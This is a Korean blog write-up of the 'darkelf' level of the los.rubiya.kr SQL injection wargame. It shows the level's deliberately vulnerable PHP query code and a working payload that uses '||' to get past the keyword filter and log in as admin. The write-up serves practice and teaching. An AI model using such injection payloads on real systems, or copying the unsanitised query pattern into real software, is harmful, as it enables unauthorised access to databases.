웹찢남

Darkelf-writeup 본문

WEB_HACKING/los.rubiya.kr

Darkelf-writeup

harry595 2019. 12. 27. 21:01

<?php 
  include "./config.php"
  login_chk(); 
  $db dbconnect();  
  if(preg_match('/prob|_|\.|\(\)/i'$_GET[pw])) exit("No Hack ~_~"); 
  if(preg_match('/or|and/i'$_GET[pw])) exit("HeHe"); 
  $query "select id from prob_darkelf where id='guest' and pw='{$_GET[pw]}'"
  echo "<hr>query : <strong>{$query}</strong><hr><br>"
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"
  if($result['id'] == 'admin'solve("darkelf"); 
  highlight_file(__FILE__); 
?>

 

이번엔 or and를 막아놨다

||로 bypass!!

 

pw=123%27||id=%27admin%27%23

'WEB_HACKING > los.rubiya.kr' 카테고리의 다른 글

Troll-writeup  (0) 2019.12.27
Orge - writeup  (0) 2019.12.27
Wolfman-writeup  (0) 2019.12.27
Orc-writeup  (0) 2019.12.27
Goblin-writeup  (0) 2019.12.27
'WEB_HACKING/los.rubiya.kr' Related Articles more
Comments